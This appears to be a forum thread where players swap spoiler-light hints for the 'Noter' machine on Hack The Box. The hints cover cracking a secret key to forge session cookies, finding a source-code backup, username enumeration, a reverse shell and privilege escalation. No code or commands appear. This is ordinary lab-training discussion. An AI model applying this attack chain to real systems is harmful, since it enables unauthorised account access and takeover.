to forge that… we need a secret key, right ? …
It is possible to crack the key using the same tool.
2 Likes
RTFM is key whenever you are able to log in as a different user!
oh well … I was using the wrong tool.
I guess I really needed to do a better research about the used backend and not just guess by looking at the co****.
Can’t think of anything to add to rocksxebec’s overview.
I did not expect the privesc and had to use a time machine to get the data I needed.
Thanks kavigihan for the fun box.
No space left on device
Feels bad man
1 Like
So it is NOT what i think the cookie is ?
Your first guess about the cookie is probably wrong.
You really need to know what framework is in use.
Not shure if there is a tool that could show you exactly what it is.
I myself looked at everything I got from the server and guessed the right one. (maybe I was just lucky or maybe there does not exist that many for that language that is used)
After you have the name of that framework you would need to search for a specific tool for “forging”.
But currently I’m stuck again because of server issues.
First the flag inside the user.txt was not accepted (I guess you are not supposed to crack the hash inside).
And at the moment the site I need is just loading infinitely…
Edit:
Great … now I got root and the root.txt is not working either.
I hate it …
Edit again:
Solved my “incorrect flag”-problem by choosing another vpn-server.
For some reason the top right icon on hackthebox was also red, not showing that I was connected.
I guess I was using just old ovpn files … still wonder why I was able to connect to the Noter-server.
Yesterday the machine was at 100% full / , today is at 60%, so it seems that was not intentional
@gnt48 you probably need the source code to continue.
Just ask yourself what lazy person(yes, that contradiction is intentional) might have a backup of it … and where.
Some hint on the privesc? somebody above said it is basic privesc, maybe I’m missing something obvious…
1 Like
A major hint on how you might approach the privilege escalation is subtly hidden away in the source code.
2 Likes
Hey someone can help me a little bit with user flag? 
Thank you! you are totally right, but for those who never struggled with it before, I guess that the key is to make a good p****** enumeration and to see what they can do with that.
I think that that thing in source code is much easier/visible than the second part 
1 Like
You can read a lot of hints here on this thread:
- s***** c*****
- back-end technology (what is the programming language? Can you guess what is behind it?)
- “forge / forging” (when you figure out the previous question, it shouldnt be difficult for you to find smt in google to resolve this step)
Look at the source code and try running parts of it locally to see how it behaves. Checking how the code behaves should be enough to give you an idea on how to pop a shell.
A Little hint I guess. Both files are valid.
Regarding that function. Think about nesting.
The rev shell is standard, but understanding how the back end will deal with it is key here.
I’m in the process of finding a real user to login. Someone says you can guess on the public pages, but where ?
I found a user someone has created, and I’m trying to bruteforce others. It’s slow, and I don’t think it’s the right way. I already have the tool to forge the token.
Any hint please?
You can work around the issues with [bad gas] by using a [greek mythological monster] cure!
Having a lot of problem with root flag… Look like I’m getting a lot of error. Everytime I try the same path, sometimes work, then say “this don’t exist” so I try to recreate it and now I get another error. Then If I try it again I can reach some point and then… error again… stuff just disappear a lot of time… I’m really stucked and I don’t know if that is wrong or if there is something wrong with the machine.